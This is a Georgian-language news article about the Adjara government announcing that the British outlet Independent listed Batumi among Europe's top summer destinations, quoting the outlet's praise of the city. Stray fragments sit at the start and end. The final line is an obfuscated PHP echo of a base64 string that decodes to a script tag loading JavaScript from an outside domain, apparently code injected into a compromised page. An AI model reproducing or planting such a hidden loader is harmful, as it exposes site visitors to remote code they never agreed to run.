celsiusi
ავერსი შნაიდერი

პრესტიჟული ბრიტანული ონლაინ გამოცემა INDEPENDENT-ი ბათუმს ზაფხულის 10 საუკეთესო ტურისტულ მიმართულებას შორის ასახელებს, – ამის შესახებ დღეს აჭარის მთავრობის თავმჯდომარემ, თორნიკე რიჟვაძემ მთავრობის სხდომაზე განაცხადა.

აჭარის მთავრობის ინფორმაციით, ევროპული ქვეყნების ჩამონათვალში, საფრანგეთის, პორტუგალიის, ესპანეთის, ხორვატიისა და შვეიცარიის გვერდით, ბათუმი მეორე ადგილს იკავებს.

„ათი შთამაგონებელი იდეა აქტიური მოგზაურებისთვის“, – ამ სათაურით გამოქვეყნებულ სტატიაში მაღალრეიტინგული ონლაინ გამოცემა INDEPENDENT-ი აქტიურ მოგზაურებს ურჩევს, სხვა ევროპულ ქვეყნებთან ერთად ზაფხული ბათუმში გაატარონ.

„ევროპისა და აზიის გზაჯვარედინზე მდებარე ბათუმი თავად არის კულტურების, გემოების, თავგადასავლებისა და ემოციების გზაჯვარედინი, რომელიც აერთიანებს შუა საუკუნეების ხიდებს, უძველეს კულტურულ არტეფაქტებს, თვალწარმტაც ტბებსა და ავთენტურ სტუმართმოყვარე სოფლებს“, – წერს ბრიტანული გამოცემა INDEPENDENT-ი, რომელსაც მსოფლიოს მასშტაბით 100 მილიონამდე მკითხველი ჰყავს.

„ნამდვილი სილამაზე, ბათუმი – საქართველოს მეორე ქალაქი შავი ზღვის მდიდრულ სანაპიროზე – სულ უფრო მეტ მოგზაურს იზიდავს. რატომ? 2000-წლიანი მომხიბვლელი ისტორიის განმავლობაში ის შთამაგონებელი ადგილი იყო ისეთი ცნობილი მწერლებისთვის, როგორებიც იყვნენ ჯონ სტეინბეკი, კნუტ ჰამსუნი, ჯორჯ სიმენონი და მსოფლიოს წამყვანი ფიგურები – ძმები ნობელები და ალფონს როტშილდი. მსოფლიო დონის ქალაქის ცენტრში თავმოყრილია ძვირადღირებული სასტუმროები, საუკეთესო რესტორნები, სპორტული ნაგებობები და გაჟღენთილია უტყუარი ემოციებით, კლასიკური ტრადიციების პატივისცემითა და მომხიბვლელი ხელოვნების ნიმუშებით. გადაუხვიეთ ჩვეულ მარშრუტს და აღმოაჩინეთ შეუდარებელი ბათუმი“, – ნათქვამია გამოცემის სტატიაში, რომელსაც აჭარის მთავრობა ავრცელებს.

469
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");